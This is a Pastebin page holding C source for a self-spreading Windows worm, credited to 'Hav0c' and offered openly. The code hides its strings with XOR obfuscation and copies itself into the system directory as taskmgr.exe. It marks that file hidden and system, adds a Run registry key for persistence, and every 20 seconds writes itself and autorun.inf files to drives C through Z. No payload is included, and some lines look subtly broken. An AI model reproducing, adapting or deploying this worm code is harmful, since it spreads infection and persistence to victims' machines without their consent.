API tools faq
paste
Advertisement
FlyFar

Worm.Win32.Disposable - Hav0c - Rohitab

FlyFar
Jul 7th, 2023
911
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.49 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /* disposable.c - coded by Hav0c
  2.  
  3. This l33t <span class="searchlite">worm</span> is the first one I've made
  4.  
  5. that uses encrypted strings to avoid being
  6.  
  7. too suspicious when opened with hex editors
  8.  
  9. or even windbl0wz notepad. Spreads by copying itself to drives
  10.  
  11. (from C to Z, without checking if they are removable or not).
  12.  
  13. Compiles with Dev-C++ (I run it with WINE).
  14.  
  15.  
  16.  
  17. PS: I hate skiddies
  18.  
  19. PPS: Blasted Mechanism FTW!!1
  20.  
  21. */
  22.  
  23.  
  24.  
  25. #include <stdio.h>
  26.  
  27. #include <stdlib.h>
  28.  
  29. #include <string.h>
  30.  
  31. #include <windows.h>
  32.  
  33.  
  34.  
  35.  
  36. char teh<span class="searchlite">worm</span>[]="XXpewoicv*a|a"; // \\taskmgr.exe
  37.  
  38. char regkey[]="WkbpsevaXXImgvkwkbpXXSmj`kswXXGqvvajpRavwmkjXXVqjXX"; // Software\\Microsoft\\Windows\\CurrentVersion\\Run\\
  39.  
  40.  
  41.  
  42. int decrypt(char string[], int key)
  43.  
  44. {
  45.  
  46.     int strsz=strlen(string);
  47.  
  48.     int i;
  49.  
  50.     for(i=0;i<strsz;i++){
  51.  
  52.         string[i] ^= key;
  53.  
  54.     }
  55.  
  56.     return string;
  57.  
  58. }
  59.  
  60.  
  61.  
  62. int CheckForMutex(char tehMutex[])
  63.  
  64. {
  65.  
  66.     HANDLE hMutex;
  67.  
  68.     hMutex=CreateMutex(NULL,1,tehMutex);
  69.  
  70.     if(GetLastError()==ERROR_ALREADY_EXISTS){
  71.  
  72.         ExitProcess(0);
  73.  
  74.     }
  75.  
  76. }
  77.  
  78.  
  79.  
  80. void RootKit(char file[]) // Not a real rootkit obviously, just hides some stuff
  81.  
  82. {
  83.  
  84.     SetFileAttributes(file,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
  85.  
  86. }
  87.  
  88.  
  89.  
  90. void MakeRegKey(char destiny[])
  91.  
  92. {
  93.  
  94.     HKEY hKey;
  95.  
  96.     char buffer[MAX_PATH];
  97.  
  98.     strcpy(buffer,decrypt("pewoicv",4)); // taskmgr
  99.  
  100.     if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,decrypt(regkey,4),0,KEY_SET_VALUE,&hKey)||
  101.         RegOpenKeyEx(HKEY_CURRENT_USER,decrypt(regkey,4),0,KEY_SET_VALUE,&hKey)==ERROR_SUCCESS){
  102.  
  103.         RegSetValueEx(hKey,buffer,0,REG_SZ,(const unsigned char *)destiny,sizeof(destiny));
  104.  
  105.         RegCloseKey(hKey);
  106.  
  107.     }
  108.  
  109.     else{
  110.  
  111.         ExitProcess(0);
  112.  
  113.     }
  114.  
  115. }
  116.  
  117.  
  118.  
  119. void DriveSpread(char shizzle[])
  120.  
  121. {
  122.  
  123.     FILE *fp;
  124.  
  125.     int n;
  126.  
  127.     char buffer1[MAX_PATH],buffer2[MAX_PATH],buffer3[MAX_PATH];
  128.  
  129.     strcpy(buffer1,decrypt("G>XXeqpkvqj*mjb",4)); // C:\\autorun.inf
  130.  
  131.     strcpy(buffer2,decrypt("G>XXLer4g*a|a",4)); // C:\\Hav0c.exe
  132.  
  133.     strcpy(buffer3,decrypt("_eqpkvqjYXvXjktaj9Ler4g*a|aXvXjWlahhA|agqpa9Ler4g*a|aXvXj",4)); // [autorun]\r\nopen=Hav0c.exe\r\nShellExecute=Hav0c.exe\r\n
  134.  
  135.     for(n='C';n<='Z';n++){
  136.  
  137.         buffer1[0]=n;
  138.  
  139.         buffer2[0]=n;
  140.  
  141.         if(CopyFile(shizzle,buffer2,0)!=NULL){
  142.  
  143.             RootKit(buffer2);
  144.  
  145.         }
  146.  
  147.         if((fp=fopen(buffer1,writting))!=NULL){
  148.  
  149.             fprintf(fp,buffer3);
  150.  
  151.             fclose(fp);
  152.  
  153.             RootKit(buffer1);
  154.  
  155.         }
  156.  
  157.     }
  158.  
  159. }
  160.  
  161.  
  162.  
  163. int main()
  164.  
  165. {
  166.  
  167.     char sysdir[MAX_PATH];
  168.  
  169.     char <span class="searchlite">worm</span>[MAX_PATH];
  170.  
  171.     CheckForMutex(decrypt("Ler4g[Ksj~[@mk",4)); // find it out your self
  172.  
  173.     HMODULE GetModH=GetModuleHandle(NULL);
  174.  
  175.     GetModuleFileName(GetModH,<span class="searchlite">worm</span>,sizeof(<span class="searchlite">worm</span>));
  176.  
  177.     GetSystemDirectory(sysdir,sizeof(sysdir));
  178.  
  179.     strcat(sysdir,decrypt(teh<span class="searchlite">worm</span>,4));
  180.  
  181.     CopyFile(<span class="searchlite">worm</span>,sysdir,0);
  182.  
  183.     RootKit(sysdir);
  184.  
  185.     MakeRegKey(sysdir);
  186.  
  187.     while(1){
  188.  
  189.         DriveSpread(<span class="searchlite">worm</span>);
  190.  
  191.         //Payload here(function not included to avoid �b3r unl33t skiddiz <_<)
  192.  
  193.         Sleep(20000);
  194.  
  195.     }
  196.  
  197.     return 0;
  198.  
  199. }
Tags: worm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!